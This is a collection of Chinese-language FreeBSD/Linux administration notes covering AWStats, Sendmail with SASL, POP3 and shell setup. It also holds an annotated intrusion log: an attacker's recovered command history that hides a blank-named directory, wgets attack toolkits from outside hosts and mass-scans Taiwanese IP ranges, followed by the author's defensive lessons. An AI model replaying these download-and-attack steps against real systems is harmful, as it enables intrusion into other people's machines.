下載ISO檔回來，燒成光碟，光碟機先放入第一片光碟，使用光碟開機

進到第一個畫面，可直接按 Enter，也可以等10秒倒數完畢後直接就進入了安裝程序

找到了 Taiwan，OK!

選擇鍵盤語系，預設 "USA ISO" 即可，OK!

使用上下鍵選到 "Standard"，再使用 Tab 建選到 "Select"，Enter

OK!

先按鍵盤的'A' 使用整顆硬碟，再按鍵盤上的'Q'，完成

從遠端拷貝到本機
# scp 192.168.1.9:/root/file.txt .

但是身為一個系統管理者最常遇到的還是想要從 Windows XP 桌面上傳資料到 Linux 的機器裡，一般有人會說就用FTP就好了呀! 對，說得也是，但是 root 預設不能登入 FTP，我又不想為了傳檔案再去多建一個帳號，那這時候就可以用 Winscp 來傳檔案，它很像 FTP的連線方式，但是 protocal 是用 ssh 連線的，有時候也說這是 SecureFTP(SFTP)，資料有加密的FTP，一樣是輸入 1.IP 2.帳號 3.密碼 4.port 預是 22

其實我後來也發現很多 FTP Client 也已經把這個功能整合進了，例如：FileZilla ，呵...只是習慣性問題我都忘記 FileZilla 可以用，還是習慣就用了 Winscp
官方網站下載 http://www.winscp.com/

真是感動,寫得很詳細,Good!
還有它那個平台叫"moodle",是一個開放源始碼的教學平台

參考:
http://www.freebsd.org/zh/FAQ/admin.html#RCCONF-READONLY
http://www.freebsd.org/zh/FAQ/

官方網站：http://awstats.sourceforge.net/

// 接下來我們要手動去修改 awstats.smallken.conf 這個設定檔
# vi /etc/awstats/awstats.smallken.conf
// FreeBSD6.1預設apache的log檔位置
LogFile="/var/log/httpd-access.log"
// 針對 www 的登錄檔分析
LogType=W
// 怎麼輸入都可以
SiteDomain="smallken"
// 設定成中文介面
Lang="tw"
// 建立程式要用的目錄
# mkdir -p /var/lib/awstats
# cd /usr/local/awstats-6.5/wwwroot/cgi-bin/
# chmod +x ./*.pl

// 修改 httpd.conf
# vi /usr/local/etc/apache21/httpd.conf
// 這行在很後面，之前安裝程式加入的幾行中，修改這一行
Alias /awstats/ "/usr/local/awstats-6.5/wwwroot/cgi-bin/"

// 重新啟動 apache
# /usr/local/etc/rc.d/apache21.sh restart

// 修改權限
# cd /usr/local
# chmod -R 755 awstats-6.5/
# chown -R root:wheel awstats-6.5/

// 產生報表，index.html就是統計報表網頁
# cd /usr/local/awstats-6.5/wwwroot/cgi-bin/
# perl awstats.pl -config=smallken -update -output > index.html

// http://localhost/awstats/，即可看到統計網頁
// 成功之後，我們可以加入 cron
# cd /usr/local/awstats-6.5/wwwroot/cgi-bin/
# vi awstats.sh
// 加入以下內容
#!/bin/sh
cd /usr/local/awstats-6.5/wwwroot/cgi-bin/
perl awstats.pl -config=smallken -update -output > index.html

# vi /etc/crontab
// 加入以下這行，設定每天18:00自動執行統計報表
0 18 * * * root /usr/local/awstats-6.5/wwwroot/cgi-bin/awstats.sh

Linux 安裝可以參考鳥哥的站
http://linux.vbird.org/linux_server/0360apache.php#other_pkg_awstats

w // 先查看線上user
passwd // 改密碼,其實如果不改,比較難發覺被入侵
cd /var/tmp // 切換目錄到 /var/tmp,這個目錄每個人都有權限
mkdir " " // 建一個空白目錄,真的是空白,ls也看不到,除非注意到目錄個數
cd " "
wget serie.sapte.ro/as.tgz // 下載攻擊程式
tar zxvf as.tgz // 解壓縮
cd SSH/ // 這應該是程式放的位置
ls
./x 211.54; ./x 140.123 // 以下就開始執行攻擊程式,還有分網段在攻擊
./x 140.124; ./x 140.125; ./x 140.126 // 都是台灣的,真可憐
./x 140.127;./x 140.128;./x 140.129
exit // 離開
cd /var/tmp/" " // 再次登入了
ls -a
cd SSH/
history
./x 140.109;./x 140.110;./x 140.111;./x 140.112;./x 140.113 // 再次攻擊
./x 140.114
./x 140.115; ./x 140.116; ./x 140.117; ./x 140.118; ./x 140.119; ./x 140.120
./x 140.121; ./x 140.122; ./x 140.123; ./x 140.124; ./x 140.125
exit // 離開
.
. // 省略
.
w // 登入,進來換另外一種工具攻擊
cd /var/tmp
mkdir " "
cd " "
wget smeckeru.iitalia.com/delles.tar.gz
tar zxvf delles.tar.gz
rm -rf delles.tar.gz
cd delles
./a 211.54; ./a 211.20
./a 140.123; ./a 140.120; ./a 140.121; ./a 140.122; ./a 140.124; ./a 140.125; ./a 140.126; ./a 140.127; ./a 140.128; ./a 140.129; ./a 140.130
./a 129.93
./a 130.64
./a 140.131;./a 140.132;./a 140.133;./a 140.134;./a 140.135;./a 140.136;./a 140.137;./a 140.138;
exit

查看last
# last | grep student

查到 IP 是 86.122.136.2
到 www.DNSstuff.com：http://www.dnsstuff.com/ 反查IP是從哪裡來的

答案是從 romania 羅馬尼亞 來的

我想這裡需要PO點心得，下次必須要注意的地方
1.在建user的帳號密碼時，不僅密碼設定要僅慎，帳號在挑選時就要盡量避免掉常用的會被猜到的帳號。
2.若帳號只單純做ftp登入，那就編輯 /etc/passwd，把shell設定成/sbin/nologin，使其無法登入減少被入侵的機會。
3.ssh 連線破壞性很強大，所以可以的話限制其連線區域。
4.做好帳號密碼控管比起套件修補重要一百倍。
5.其實這種攻擊方式很簡單也很保守，就是剛好遇到一個嗆司就剛好被他入侵，所以除了有rkhunter偵測以外，本身身為web master 的人帳號控管真的要先做好才是王道呀。

安裝 Cyrus SASL

SASL (Simple Authentication and Security Layer) 具有身份認證的功能,讓你可以無論在任何地方
都可以順利寄出信件

// 安裝 ncftp, 若有安裝過跳過這裡
# cd /usr/ports/ftp/ncftp
# make install clean
// 安裝好執行檔在 /usr/local/bin/ncftp1

// 設定 alias
# vi /etc/profile
alias ncftp="ncftp1"

// 沒時間重開機了,直接執行
# alias ncftp="ncftp1"

// 到 ftp 抓檔案
# ncftp ftp://ftp.andrew.cmu.edu/pub/cyrus-mail
ncftp>get cyrus-sasl-2.1.22.tar.gz
ncftp>quit

# tar zxvf cyrus-sasl-2.1.22.tar.gz
# cd cyrus-sasl-2.1.22
# ./configure --enable-login --enable-plain
# make
# make install
# cd /usr/lib
# ln -s /usr/local/lib/sasl2 .
# ln -s /usr/local/lib/sasl2 sasl
# ln -s /usr/local/lib/libsasl* .
# echo "pwcheck_method: saslauthd " > /usr/lib/sasl2/Sendmail.conf

// 接著我們要在一開機時就執行 saslauthd 這支認證用的程式，請新增檔名為 /usr/local/etc/rc.d/saslauthd.sh 的執行檔，內容如下：

#!/bin/sh

case $1 in
"start")
echo "Starting saslauthd"
/usr/local/sbin/saslauthd -a pam
;;
"stop")
echo "Stoping saslauthd"
killall saslauthd
;;
*)
echo "Usage $0 start|stop"
;;
esac
// 然後將該檔案屬性變為可執行，並建立一個 saslauthd 所需使用的工作目錄：

# chmod 755 /usr/local/etc/rc.d/saslauthd.sh
# mkdir -p /var/state/saslauthd

安裝 Sendmail

在安裝 Sendmail 之前，如果系統中正在執行舊版的 Sendmail，請先使用以下指令將它
停掉：

# kill -9 `cat /var/run/sendmail.pid|head -1`
// 確認一下/etc/group和/etc/passwd,已經有smmsp這個群組跟使用者,若沒有請加入
# cat /etc/group | grep smmsp
smmsp:*:25:
# cat /etc/passwd | grep smmsp
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin

// 到ftp抓檔案

# ncftp ftp://www.sendmail.org/pub/sendmail
ncftp>get sendmail.8.13.8.tar.gz
ncftp>quit

# tar zxvf sendmail.8.13.8.tar.gz

// 接著建立檔案並加入下列內容：
# vi sendmail-8.13.8/devtools/Site/site.config.m4
PREPENDDEF(`confENVDEF', `-DMAP_REGEX')
PREPENDDEF(`confOPTIMIZE', `-O2')
APPENDDEF(`confENVDEF', `-DTCPWRAPPERS -DSASL=2')
APPENDDEF(`conf_sendmail_LIBS', `-lwrap -lsasl2')
APPENDDEF(`confLIBDIRS', `-L/usr/local/lib')
APPENDDEF(`confINCDIRS', `-I/usr/local/include')
APPENDDEF(`confENVDEF', `-DMILTER')

// 這邊解釋一下，如 `confENVDEF'，第一個`是鍵盤左上角數字1的左邊那個符號,接下來的'才是單引號

//完成後就可以開始安裝 Sendmail 了：
# cd sendmail-8.13.8/
# sh Build
# sh Build install

// 為了要讓本地的使用者不必經由身份認證使用 SMTP，還須再做下列設定：

# cd sendmail-8.13.8/obj*
# cd mail.local
# make force-install
# chown root /usr/libexec/mail.local
# chmod u+s /usr/libexec/mail.local

接下來編輯 sendmail 設定範本檔案以便產生出具有身分認證功能的 sendmail.cf 設定檔，請以下列指令執行：

# cd sendmail-8.13.8/cf/cf/
# cp generic-bsd4.4.mc MYCF.mc
# cd ../feature
# cat access_db.m4 >> ../cf/MYCF.mc
# cat delay_checks.m4 >> ../cf/MYCF.mc
# cat virtusertable.m4 >> ../cf/MYCF.mc
# cd ../cf
# cat >> MYCF.mc
TRUST_AUTH_MECH(`LOGIN PLAIN')dnl
define(`confAUTH_MECHANISMS', `LOGIN PLAIN')dnl
^D(同時按Ctrl+D)

接著我們要建立 sendmail.cf：

# sh Build MYCF.cf
# cp MYCF.mc /etc/mail/sendmail.mc
# cp MYCF.cf /etc/mail/sendmail.cf

接下來請編輯 /etc/mail/access 這個檔案，我們可以在 access 指定哪些 IP 或 domain 來源的機器是否可以經由我們的伺服器寄信。如果您希望自己內部網域的機器可以不必使用身份認証，你可以在這個檔案中加入內部網域的 IP。
# cd /etc/mail
# vi access
127.0.0.1 RELAY
# 內部網路不需要認証
192.168.0 RELAY

// 接著請產生二個 sendmail 所需要的檔案：

# touch /etc/mail/virtusertable
# touch /etc/mail/aliases

// 然後請新增 /etc/mail/local-host-names 的檔案，裡面填入 localhost 以及機器的完整名字

# vi local-host-names
localhost
test.edu.tw

// 當收到信的收件者不是給 test.edu.tw 時便會拒絕

接著，再新增一個檔名為 /etc/mail/relay-domains 的檔案填入本地的 domainname，
例如: edu.tw
這樣一來由本地的 domain 發信時便不需再一次做使用者認證。然後將這些檔案做成 sendmail 能接受的 DB 格式：
# vi relay-domains
edu.tw

# cd /etc/mail
# makemap hash access.db < access
# makemap hash virtusertable.db < virtusertable
# newaliases
這樣就完成了。您可以執行
# sendmail -d0.1 -bv root | grep SASL
應該會出現 SASL 的字樣，表示己可認証。

最後，我們可以使用下列指令來啟動認證所需的程式及 Sendmail：

// 啟動 sasl
# /usr/local/etc/rc.d/saslauthd.sh start

// 啟動 sendmail
# /usr/sbin/sendmail -bd -q30m

在啟動 Sendmail 之後，如果執行
# telnet localhost 25
再打
ehlo localhost
我們應該看到一堆 250- 開頭的訊息，其中有一行
250-AUTH LOGIN PLAIN
就代表 Sendmail己經具有身份認證的功能，此時請輸入
quit
結束。萬一沒有出現，請閱讀 /var/log/maillog 裡面的訊息可以知道錯在哪裡。

如果我們希望在一開機便啟動 Sendmail，請在 /etc/rc.conf 中加入
# vi /etc/rc.conf
sendmail_enable="YES"

// 安裝 POP3 伺服器

POP3 的設定很簡單，我們只要選一個喜歡的 pop3 軟體，以 ports 安裝完後再做一些設定就好了。在這裡我選用 popa3d：

# cd /usr/ports/mail/popa3d
# make install clean

// 接著編輯 /etc/inetd.conf，找到 pop3 的部份，將開頭的 # 拿掉後，並加以修改如下：

# vi /etc/inetd.conf
pop3 stream tcp nowait root /usr/local/libexec/popa3d popa3d

// 接著重新跑 inetd 即可：

# kill -HUP `cat /var/run/inetd.pid`

// root 不可以直接 ssh 遠端登入, 所以增加一個使用者
# useradd smallken

// 把 smallken 加入 whell 的群組裡, 才可以 su -
# vi /etc/group

// 安裝CVSup及bash
１、# Sysinstall
２、選擇 Configure Do Post-install Configuration of FreeBSD 後設定
３、選擇 Packages Install pre-packaged software for FreeBSD
４、選擇 FTP Install from an FTP server
５、選擇 URL Specify some other ftp site by URL 自訂ftp站台位置。
６、輸入自訂ftp站台位置。URL: ftp://freebsd.csie.nctu.edu.tw/pub/CVSup/
７、找到 net Networking utilities.
８、將 cvsup-without-gui-16.1h_2 打勾，後按 [ OK ] 跳往上一層
９、選shells項目進入子選單
１０、將 bash-2.05b.007_2 打勾，後按 [ OK ] 跳往上一層
１１、選sysutils項目進入子選單
１２、將 portupgrade 打勾，後按 [ OK ] 跳往上一層
１３、確認之後按下[ Install ]，就可以開始安裝了

// 設定預設的shell為bash
# vipw
改成 root::0:0::0:0:Charlie &:/root:/usr/local/bin/bash

// 解決ssh到FreeBSD的中文亂碼
使用 CSH 方式如下：在 /etc/csh.cshrc 加入下面三行後重開機即可 show 中文
編碼。
vi etc/csh.cshrc
setenv LC_CTYPE en_US.ISO8859-1
setenv LC_ALL zh_TW.Big5
setenv LANG zh_TW.Big5
// 使用 BASH 方式如下：在 /etc/profile 中加入下面三行後重開機就可 show 中文
編碼。
#vi etc/profile
LC_CTYPE=en_US.ISO8859-1 ; export LC_CTYPE
LC_ALL=zh_TW.Big5 ; export LC_ALL
LANG=zh_TW.Big5 ; export LANG

// 設定提示符號的格式
# echo 'PS1="[u@h w]\$ "' >> /etc/profile

// 設定文字模式下變成目錄以及檔案變成彩色的
１、進入 ports的gnuls目錄底下
cd /usr/ports/misc/gnuls/
make install clean
２、安裝完後如果shell 是 bash 則設定
vi /etc/profile
alias ls="gnuls --color=auto --show-control-chars"
３、安裝完後如果shell 是 csh 則設定
vi /etc/csh.cshrc
alias ls 'gnuls --color=auto --show-control-chars'
更新 port tree

# cp /usr/share/examples/cvsup/ports-supfile /root/
# vi /root/ports-supfile
*default host=cvsup.tw.freebsd.org
# cvsup -g -L 2 /root/ports-supfile

// 使用 ports

你可以用 cd /usr/ports/ ; make search key="gettext" | more 查詢
當你安裝完後，想要移除該軟體時，只要在該軟體的 ports 目錄中打 make deinstall
即可。請注意，不要在 /usr/ports 的目錄中打 make deinstall，這樣可是會將 "所有"
軟體都移除喔。
還有一些較不常用的 make 方式，簡述如下：

make fetch：抓回所需的原始檔。
make fetch-list：顯示安裝所需的檔案。
make checksum：抓回原始檔並以 MD5 檢查其正確性。
make extract：抓回並解開原始檔。
make configure：進行組態，但不繼續編譯。
make all install：抓回原始檔、編譯且安裝。
make reinstall：若先前發生意外中斷，以此命令繼續嘗試安裝。
make package：將做好的 ports 打包製作成 packages。
make config: 跳出選擇擇套作清單

安裝完成它說執行檔放在 /usr/local/bin/iptraf，使用方法可以直接執行
# iptraf
或者
# iptraf -s eth0